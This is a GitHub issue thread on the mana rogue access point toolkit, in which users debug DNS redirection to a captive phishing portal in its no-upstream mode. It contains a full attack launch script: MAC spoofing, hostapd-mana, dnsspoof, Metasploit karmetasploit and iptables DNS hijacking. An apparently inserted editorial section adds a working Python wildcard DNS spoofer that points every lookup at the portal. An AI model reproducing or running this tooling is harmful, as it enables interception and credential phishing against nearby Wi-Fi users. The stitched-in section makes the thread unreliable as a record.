sensepost / mana

*DEPRECATED* mana toolkit for wifi rogue AP attacks and MitM
https://w1f1.net/

No redirect/access to captive portal. #75

Open HeavensWing opened 7 years ago

HeavensWing commented 7 years ago

I'm running Nethunter on an S7E with TL-722n.

When running start-noupstream.sh everything seems fine: the AP comes up and everything is as it should be. For a short period of time, I can connect with my laptop, hit an http site and be redirected to my captive portal. This all has to be done within about 5-10 seconds. After that the AP shows "No internet connectivity" on the laptop and I can't reach the site even by using the 10.0.0.1 address. I can't ping the gateway either.

I cleared all the iptables thinking that an incoming connection was being blocked yet it didn't help.

I set up the exact same test in a VM on my laptop and everything works fine, so I don't know what's stopping my phone from working.

What is also strange: if I connect to the AP via my phone (the same device I'm running the test on), I can reach the page using the address 10.0.0.1.

/usr/share/mana-toolkit/run-mana/start-noupstream.sh:

```bash
#!/bin/bash

phy=wlan1
conf=/etc/mana-toolkit/hostapd-mana.conf
hostapd=/usr/lib/mana-toolkit/hostapd

hostname WRT54G
echo hostname WRT54G
sleep 2

service network-manager stop
rfkill unblock wlan

ifconfig $phy down
macchanger -r $phy
ifconfig $phy up

# point hostapd-mana and the karmetasploit resource script at $phy
sed -i "s/^interface=.*$/interface=$phy/" $conf
sed -i "s/^set INTERFACE .*$/set INTERFACE $phy/" /etc/mana-toolkit/karmetasploit.rc
$hostapd $conf&
sleep 5
ifconfig $phy 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

# DNS/DHCP for the rogue AP: dnsspoof answers the queries it sniffs on $phy,
# dnsmasq hands out leases and is the listener on 10.0.0.1:53
dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf&
dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf -i $phy
# duplicate invocations from the posted script, left disabled: a second dnsmasq
# cannot bind port 53, and dnsmasq rejects a bare interface name (it must be
# passed with -i)
#dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf $phy
#dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf $phy
#dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf&
service apache2 start
stunnel4 /etc/mana-toolkit/stunnel.conf
tinyproxy -c /etc/mana-toolkit/tinyproxy.conf&
msfconsole -r /etc/mana-toolkit/karmetasploit.rc&

# no upstream: forwarding is on, and the only NAT rule drags client DNS to the portal
echo '1' > /proc/sys/net/ipv4/ip_forward
iptables --policy INPUT ACCEPT
iptables --policy FORWARD ACCEPT
iptables --policy OUTPUT ACCEPT
iptables -F
iptables -t nat -F
iptables -t nat -A PREROUTING -i $phy -p udp --dport 53 -j DNAT --to 10.0.0.1

echo "Hit enter to kill me"
read
pkill hostapd
pkill dnsmasq
pkill dnsspoof
pkill tinyproxy
pkill stunnel4
pkill ruby
service apache2 stop
iptables -t nat -F
```

sku77 commented 7 years ago

Same with me. Can you help us with this? I am also running it on Nethunter. I can connect to the phone but can't ping the captive portal 10.0.0.1. Thanks in advance.

tanc7 commented 7 years ago

Hey, I am not the dev who made this, but from some debugging I noticed there is an issue with the DNS redirection. At least you managed to get the IP leases fixed. I am assuming you are running /usr/share/mana-toolkit/run-mana/start-noupstream.sh

By default it is supposed to use DNSMasq and Metasploit's FakeDNS module for the redirection. It tells msfconsole to run this file /etc/mana-toolkit/karmetasploit.rc

It already has the proper pointers, basically saying "all traffic from DNS requests goes to 10.0.0.1", or "phishing page".

The pointer is here: dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf inside of the file: /usr/share/mana-toolkit/run-mana/start-noupstream.sh

The file is located here: /etc/mana-toolkit/dnsspoof.conf

It does the same thing, again, in Metasploit with the auxiliary/server/fakedns module. But in the latest version of the karmetasploit resource script, it appears it got commented out. https://github.com/sensepost/mana/commit/8c0286c8e69219a53e2b1351d6ce73957e506e5c

I have been trying other methods, like attempting to use DNSChef instead. But then it locks out DNSMasq because it's fighting for the same port and host.

However, the with-uplink attack works perfectly; it is the no-uplink attack with a captive phishing portal that seems to have DNS issues. I tried running "host", "nslookup", and "dig" and it keeps resolving to the real legitimate IP address.
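To make the redirection tanc7 describes concrete, here is an added example written for this page (it is not code from mana-toolkit, dnsspoof or Metasploit): a minimal wildcard DNS responder that answers every A query with the portal address, which is what a `*` entry in dnsspoof.conf or the auxiliary/server/fakedns module does in no-upstream mode, plus a parser for the reply so that the check tanc7 ran with dig (does the AP answer with 10.0.0.1, or with the real address?) can be scripted against a client-side capture. The portal address 10.0.0.1 is taken from the script above; the function names, the fixed transaction ID and the sample query are the example's own assumptions.

```python
import socket
import struct
from typing import Optional

# Assumption: the address the captive portal (apache2 in the script) listens on.
PORTAL_IP = "10.0.0.1"

QTYPE_A, QTYPE_ANY = 1, 255


def parse_question(packet: bytes):
    """Return (txid, qname, qtype, offset_after_question) for a DNS packet."""
    if len(packet) < 12:
        raise ValueError("shorter than a DNS header")
    txid, _flags, qdcount = struct.unpack("!HHH", packet[:6])
    if qdcount < 1:
        raise ValueError("no question section")
    labels, pos = [], 12
    while True:
        length = packet[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compressed name in question not supported")
        labels.append(packet[pos:pos + length].decode("ascii"))
        pos += length
    qtype = struct.unpack("!H", packet[pos:pos + 2])[0]
    return txid, ".".join(labels), qtype, pos + 4  # skip QTYPE and QCLASS


def build_response(query: bytes, answer_ip: str = PORTAL_IP, ttl: int = 60) -> bytes:
    """Answer an A (or ANY) query with answer_ip; other types get an empty NOERROR.

    This is the wildcard behaviour of a '*' line in dnsspoof.conf: whatever name
    the client asked for, it is told the portal address.
    """
    txid, _qname, qtype, qend = parse_question(query)
    question = query[12:qend]
    flags = 0x8180  # QR=1 (response), RD=1, RA=1, RCODE=0
    if qtype in (QTYPE_A, QTYPE_ANY):
        rdata = socket.inet_aton(answer_ip)
        # 0xC00C is a compression pointer to the question name at offset 12
        answer = struct.pack("!HHHIH", 0xC00C, QTYPE_A, 1, ttl, len(rdata)) + rdata
        ancount = 1
    else:
        answer, ancount = b"", 0
    return struct.pack("!HHHHHH", txid, flags, 1, ancount, 0, 0) + question + answer


def build_query(qname: str, qtype: int = QTYPE_A, txid: int = 0x1234) -> bytes:
    """Constructed client query (what `dig qname @10.0.0.1` sends), for offline use."""
    name = b"".join(bytes([len(l)]) + l.encode("ascii") for l in qname.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + name + struct.pack("!HH", qtype, 1)


def answered_address(response: bytes) -> Optional[str]:
    """First A record in a response, or None.

    Client-side check: if a query sent to the AP comes back with the real address
    instead of PORTAL_IP, the spoofer is not the process answering (the symptom
    tanc7 saw with host/nslookup/dig).
    """
    _, _, _, pos = parse_question(response)
    ancount = struct.unpack("!H", response[6:8])[0]
    for _ in range(ancount):
        if response[pos] & 0xC0 == 0xC0:
            pos += 2  # compression pointer
        else:
            while response[pos] != 0:
                pos += response[pos] + 1
            pos += 1
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", response[pos:pos + 10])
        pos += 10
        if rtype == QTYPE_A and rdlen == 4:
            return socket.inet_ntoa(response[pos:pos + 4])
        pos += rdlen
    return None


def serve(bind_ip: str = PORTAL_IP, port: int = 53) -> None:
    """Answer every query on bind_ip:port with PORTAL_IP (needs root for port 53).

    Only one process can own 10.0.0.1:53; that is the port dnsmasq and DNSChef
    were fighting over in this thread, so stop them before running this.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind_ip, port))
    while True:
        data, peer = sock.recvfrom(512)
        try:
            sock.sendto(build_response(data), peer)
        except ValueError:
            continue  # not a query we can parse; ignore it


if __name__ == "__main__":
    serve()
```

Used offline, `answered_address(build_response(build_query("example.com")))` returns `10.0.0.1`; fed a reply captured from a client that still resolves to the real address, it returns that address instead, which is the quickest way to tell whether the spoofer or the upstream resolver answered. The responder only handles A and ANY queries and uncompressed question names, which is all a client's first lookup needs to land on the portal.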